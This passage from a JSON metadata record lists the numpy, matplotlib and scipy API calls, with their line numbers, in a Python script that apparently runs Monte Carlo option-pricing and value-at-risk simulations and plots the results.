"matplotlib.pyplot.close", "line_number": 323, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 323, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 325, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 325, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 326, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 326, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 327, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 327, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 328, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 328, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 329, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 329, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 330, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 330, "usage_type": "name"}, {"api_name": "numpy.random.seed", "line_number": 336, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 336, "usage_type": "name"}, {"api_name": "numpy.random.standard_normal", "line_number": 337, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 337, "usage_type": "name"}, {"api_name": "numpy.random.standard_normal", "line_number": 341, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 341, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 342, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 343, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 347, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 347, "usage_type": "name"}, {"api_name": "numpy.random.standard_normal", "line_number": 348, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 348, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 349, "usage_type": "call"}, {"api_name": "numpy.random.standard_normal", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 351, "usage_type": "name"}, {"api_name": "numpy.random.standard_normal", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 377, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 378, "usage_type": "call"}, {"api_name": "numpy.random.standard_normal", "line_number": 380, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 380, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 400, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 401, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 401, "usage_type": "attribute"}, {"api_name": "bsm_functions.bsm_call_value", "line_number": 405, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 406, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 407, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 408, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 410, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 410, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 423, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 423, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 424, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 424, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 426, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 426, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 440, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 440, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 441, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 441, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 447, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 451, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 452, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 454, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 454, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 467, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 467, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 468, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 468, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 491, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 492, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 494, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 496, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 496, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 523, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 527, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 528, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 531, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 533, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 535, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 535, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 561, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 563, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 567, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 568, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 571, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 573, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 575, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 577, "usage_type": "call"}, {"api_name": "numpy.polyval", "line_number": 578, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 579, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 581, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 594, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 595, "usage_type": "call"}, {"api_name": "numpy.random.standard_normal", "line_number": 595, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 595, "usage_type": "name"}, {"api_name": "numpy.sort", "line_number": 596, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 598, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 598, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 599, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 599, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 600, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 600, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 601, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 601, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 602, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 602, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 603, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 603, "usage_type": "name"}, {"api_name": "scipy.stats.scoreatpercentile", "line_number": 606, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 606, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 613, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 614, "usage_type": "call"}, {"api_name": "numpy.random.standard_normal", "line_number": 616, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 616, "usage_type": "name"}, {"api_name": "numpy.random.standard_normal", "line_number": 617, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 617, "usage_type": "name"}, {"api_name": "numpy.random.poisson", "line_number": 618, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 618, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 620, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 621, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 622, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 624, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 625, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 627, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 627, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 628, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 628, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 629, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 629, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 630, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 630, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 631, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 631, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 632, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 632, "usage_type": "name"}, {"api_name": "scipy.stats.scoreatpercentile", "line_number": 635, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 635, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 641, "usage_type": "call"}, {"api_name": "scipy.stats.scoreatpercentile", "line_number": 642, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 642, "usage_type": "name"}, {"api_name": "scipy.stats.scoreatpercentile", "line_number": 643, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 643, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 645, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 645, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 646, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 646, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 647, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 647, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 648, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 648, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 649, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 649, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 650, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 650, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 651, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 651, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 652, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 652, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 653, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 653, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 661, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 662, "usage_type": "call"}, {"api_name": "numpy.random.standard_normal", "line_number": 662, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 662, "usage_type": "name"}, {"api_name": "numpy.random.poisson", "line_number": 665, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 665, "usage_type": "name"}, {"api_name": "numpy.where", "line_number": 666, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 667, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 667, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 668, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 668, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 670, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 670, "usage_type": "call"}, {"api_name": "numpy.count_nonzero", "line_number": 674, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 676, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 676, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 677, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 677, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 678, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 678, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 679, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 679, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 680, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 680, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 681, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 681, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 682, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 682, "usage_type": "name"}, {"api_name": "numpy.maximum", "line_number": 685, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 686, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 686, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 688, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 688, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 690, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 690, "usage_type": "call"}, {"api_name": "numpy.count_nonzero", "line_number": 692, "usage_type": "call"}, {"api_name": "numpy.count_nonzero", "line_number": 693, "usage_type": "call"}, {"api_name": "numpy.count_nonzero", "line_number": 694, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 696, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 696, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 697, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 697, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 698, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 698, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 699, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 699, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 700, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 700, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 701, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 701, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 702, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 702, "usage_type": "name"}]}